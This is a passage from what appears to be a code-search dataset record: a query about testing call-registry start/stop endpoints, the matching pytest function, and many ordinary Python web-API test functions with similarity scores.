\"2000.00\"\n\n # check for bad request due to missing params\n resp = client.get(\"/api/v2/references/agency/4/\")\n assert resp.data == {\"results\": {}}", "def test_index(self):\n tester = app.test_client(self) # You can use self.app in place of tester\n response = tester.get('/', content_type='html/text')\n self.assertEqual(response.status_code, 200)", "def test_index(self):\n tester = app.test_client(self)\n response = tester.get(\"/\")\n self.assertEqual(response.status_code,200)\n assert b\"Moscow Ring Road Distance Finder\" in response.data\n assert b\"search address\" in response.data", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_view(self):\n response = self.client.get('/plugin/sample/ho/he/')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content, b'Hi there testuser this works')", "def test_index():\n result = views.index(testing.DummyResource(), testing.DummyRequest())\n\n # Pyramid's host url defaults to http://example.com\n host = 'http://example.com'\n links = result['links']\n assert links['annotation']['create']['method'] == 'POST'\n assert links['annotation']['create']['url'] == host + '/annotations'\n assert links['annotation']['delete']['method'] == 'DELETE'\n assert links['annotation']['delete']['url'] == host + '/annotations/:id'\n assert links['annotation']['read']['method'] == 'GET'\n assert links['annotation']['read']['url'] == host + '/annotations/:id'\n assert links['annotation']['update']['method'] == 'PUT'\n assert links['annotation']['update']['url'] == host + '/annotations/:id'\n assert links['search']['method'] == 'GET'\n assert links['search']['url'] == host + '/search'", "def test_officer_access(self):\n self.client.login(self.officer.email)\n for url in self.urls_get:\n response = self.client.get(url, follow=False)\n self.assertEqual(200, response.status_code)\n for url in self.urls_post:\n response = self.client.post(url['url'], url['data'], follow=True)\n self.assertEquals(200, response.status_code)", "def test_uses_wraps(self):\n @self.actions(\"ctx_name\", [])\n def myview(request, some_id):\n \"\"\"docstring\"\"\"\n\n self.assertEqual(myview.func_name, \"myview\")\n self.assertEqual(myview.func_doc, \"docstring\")", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_show_introduction(self):\n # test say hello\n user = {'id':123, 'username':'test_user'}\n result = self.datacenter.show_introduction(user)\n\n self.assertEqual(\n result['response_function'],\n 'send_poll'\n )\n\n # test after vote\n data = {'selected_option': 'Feedback'}\n self.datacenter.talks[123] = {}\n result = self.datacenter.show_introduction(user, data, is_response=True)\n self.assertEqual(result['response_function'],'feedback')", "def test_response_200_on_get(self):\n pass", "def test_request_views(self):\n user = User.objects.get(pk=1)\n url_names = [\n ['private_requests', {}],\n ['sent_private_requests', {}],\n ['public_requests', {}],\n ['public_applications', {}],\n ['request_write', {}],\n ['request_write', {'username':user.username}],\n ['public_band_request', {}],\n ['request_appy_to_band', {'request_id':1}],\n ]\n\n for url_name in url_names:\n response = self.client.get(reverse(url_name[0], kwargs=url_name[1]))\n self.assertEqual(response.status_code, 302)\n\n self.client.post(reverse('login'),\n data={'identification': '[email protected]',\n 'password': 'blowfish'})\n for url_name in url_names:\n response = self.client.get(reverse(url_name[0], kwargs=url_name[1]))\n self.assertEqual(response.status_code, 200)", "def test_mocked_get_api(self):\n c = Client()\n response = c.get(\"/apimock/mocked/api/account/154/\")\n self.assertEqual(response.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response.content)\n response2 = c.get(\"/apimock/mocked/api/account/187/\")\n self.assertEqual(response2.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response2.content)", "def test_detail(self):\n # Test detail URL using ad_guid.\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n # Test URL using email also.\n url = '/api/users/{}/'.format(self.user1.email.lower())\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def test_api_urls():\n # Test the status message - 404 not good , 200 good\n assert API_RH.create_req().status_code == 200, \"The tests for URLs were successful\"" ]
[ "0.6804205", "0.65882033", "0.6567295", "0.6547328", "0.6524265", "0.64814574", "0.6474007", "0.6394351", "0.6393633", "0.6392588", "0.6389973", "0.62900865", "0.62861174", "0.62557405", "0.62550545", "0.6218095", "0.61950505", "0.61669517", "0.61537933", "0.6125932", "0.6122042", "0.61097145", "0.61054593", "0.6094031", "0.6087082", "0.608544", "0.6082286", "0.6073124", "0.60656184", "0.60597664", "0.60544556", "0.60521287", "0.6027421", "0.6017153", "0.6010231", "0.6009154", "0.5994922", "0.5992891", "0.5992315", "0.59840107", "0.5983212", "0.5983212", "0.5979968", "0.5976745", "0.59712815", "0.59610325", "0.5942957", "0.5940497", "0.5935404", "0.59316516", "0.59256685", "0.5913199", "0.5905215", "0.59025735", "0.59017545", "0.5897542", "0.58922374", "0.589193", "0.58905953", "0.5889708", "0.5880618", "0.5873864", "0.5870475", "0.58651286", "0.5863064", "0.5856253", "0.5856253", "0.5854883", "0.5851133", "0.5841043", "0.58405495", "0.5833263", "0.58314776", "0.58286947", "0.5823139", "0.58156115", "0.580827", "0.58045864", "0.58012956", "0.58007365", "0.58001494", "0.5799902", "0.5797075", "0.5797075", "0.57899016", "0.57873267", "0.5784846", "0.5776723", "0.5776723", "0.5764936", "0.5762085", "0.57594174", "0.5755052", "0.5754132", "0.5747267", "0.57447803", "0.5739847", "0.573893", "0.5734626", "0.5733204" ]
0.7911585
0
Test POSTing a start and a stop registry and expect get it at Call API Endpoint Test uses start_call_fx fixture Test uses stop_call_fx fixture
def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx, stop_call_fx): post_url = reverse_lazy('calls:registry-list') post_data = [start_call_fx, stop_call_fx] for data in post_data: response = client.post(post_url, data, content_type='application/json') assert response.status_code == status.HTTP_201_CREATED get_url = reverse_lazy('calls:call-list') response = client.get(get_url) assert len(response.data) == 1 assert response.data[0].get('start_timestamp') assert response.data[0].get('stop_timestamp')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_program_start_and_stop(\n aresponses: ResponsesMockServer,\n authenticated_local_client: ResponsesMockServer,\n program_start_stop_response: dict[str, Any],\n) -> None:\n async with authenticated_local_client:\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/start\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/stop\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n\n async with aiohttp.ClientSession() as session:\n client = Client(session=session)\n await client.load_local(\n TEST_HOST, TEST_PASSWORD, port=TEST_PORT, use_ssl=False\n )\n controller = next(iter(client.controllers.values()))\n\n data = await controller.programs.start(1)\n assert data[\"message\"] == \"OK\"\n\n data = await controller.programs.stop(1)\n assert data[\"message\"] == \"OK\"\n\n aresponses.assert_plan_strictly_followed()", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_start_several_values(self):\n for ip in [\"1.1.1.1\", \"2.2.2.2\", \"3.3.3.3\"]:\n self.client.ensure_path(\"/services/db/%s\" % ip)\n self.client.set(\"/services/db/%s\" % ip,\n json.dumps({\"enabled\": \"1\",\n \"ip\": ip}))\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf)\n z.loop(2, timeout=self.TIMEOUT)\n self.conf.write.assert_called_with({\"1.1.1.1\": {\"enabled\": \"1\", \"ip\": \"1.1.1.1\"},\n \"2.2.2.2\": {\"enabled\": \"1\", \"ip\": \"2.2.2.2\"},\n \"3.3.3.3\": {\"enabled\": \"1\", \"ip\": \"3.3.3.3\"}})", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def test_get_run(self):\n pass", "async def test_action(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"open\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"close\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_stop\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"stop\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover\")\n stop_calls = async_mock_service(hass, \"cover\", \"stop_cover\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}\n assert stop_calls[0].domain == DOMAIN\n assert stop_calls[0].service == \"stop_cover\"\n assert stop_calls[0].data == {\"entity_id\": entry.entity_id}", "def test_API(self):\n print(\"Test API ...\")\n t0 = time.time()\n c = 0\n for trip_headsign in TRIP_HEADSIGN:\n for stop in STOP_A:\n payload = {'format': 'json', 'route_id': \"A\", 'trip_headsign': trip_headsign, 'stop_name': stop}\n req = requests.get('https://applications002.brest-metropole.fr/WIPOD01/Transport/REST/getRemainingTimes',params=payload)\n if len(req.text) < 100 : #API answer 189 characters if it works well\n print(\"API not responding for parameters : {}, {} \".format(trip_headsign, stop))\n c += 1\n else :\n print(\"Params : {}, {} : {}\".format(trip_headsign, stop, req.text))\n duration = time.time() - t0\n print(\"END OF TEST : duration : {} s, {} requests failed\".format(duration, c))", "async def test_list_fleet(client):\n group_param = {}\n params = [('access_token', 'access_token_example'),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('limit', 56)]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def test_gwservice_updatedevice(self, setup_controller):\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n payload = {'serialNumber': 'DEADBEEF0011',\n 'owner': 'pytest'}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"PUT\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"GET\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create device verify\", body=body)\n if resp.status_code != 200:\n assert False\n\n device = json.loads(resp.text)\n print (device)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n @pytest.mark.sdk_restapi\n def test_gwservice_deletedevice(self, setup_controller):\n \"\"\"\n Test the delete device endpoint\n WIFI-3455\n \"\"\"\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def test_run_started(self):", "def testApi(self):", "async def test_service_calls(oppio_env, opp, aioclient_mock):\n assert await async_setup_component(opp, \"oppio\", {})\n\n aioclient_mock.post(\"http://127.0.0.1/addons/test/start\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stop\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/restart\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/update\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stdin\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/shutdown\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/reboot\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/full\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/partial\", json={\"result\": \"ok\"})\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/full\", json={\"result\": \"ok\"}\n )\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/partial\", json={\"result\": \"ok\"}\n )\n\n await opp.services.async_call(\"oppio\", \"addon_start\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_stop\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_restart\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_update\", {\"addon\": \"test\"})\n await opp.services.async_call(\n \"oppio\", \"addon_stdin\", {\"addon\": \"test\", \"input\": \"test\"}\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 8\n assert aioclient_mock.mock_calls[-1][2] == \"test\"\n\n await opp.services.async_call(\"oppio\", \"host_shutdown\", {})\n await opp.services.async_call(\"oppio\", \"host_reboot\", {})\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 10\n\n await opp.services.async_call(\"oppio\", \"snapshot_full\", {})\n await opp.services.async_call(\n \"oppio\",\n \"snapshot_partial\",\n {\"addons\": [\"test\"], \"folders\": [\"ssl\"], \"password\": \"123456\"},\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 12\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n }\n\n await opp.services.async_call(\"oppio\", \"restore_full\", {\"snapshot\": \"test\"})\n await opp.services.async_call(\n \"oppio\",\n \"restore_partial\",\n {\n \"snapshot\": \"test\",\n \"openpeerpower\": False,\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n },\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 14\n assert aioclient_mock.mock_calls[-1][2] == {\n 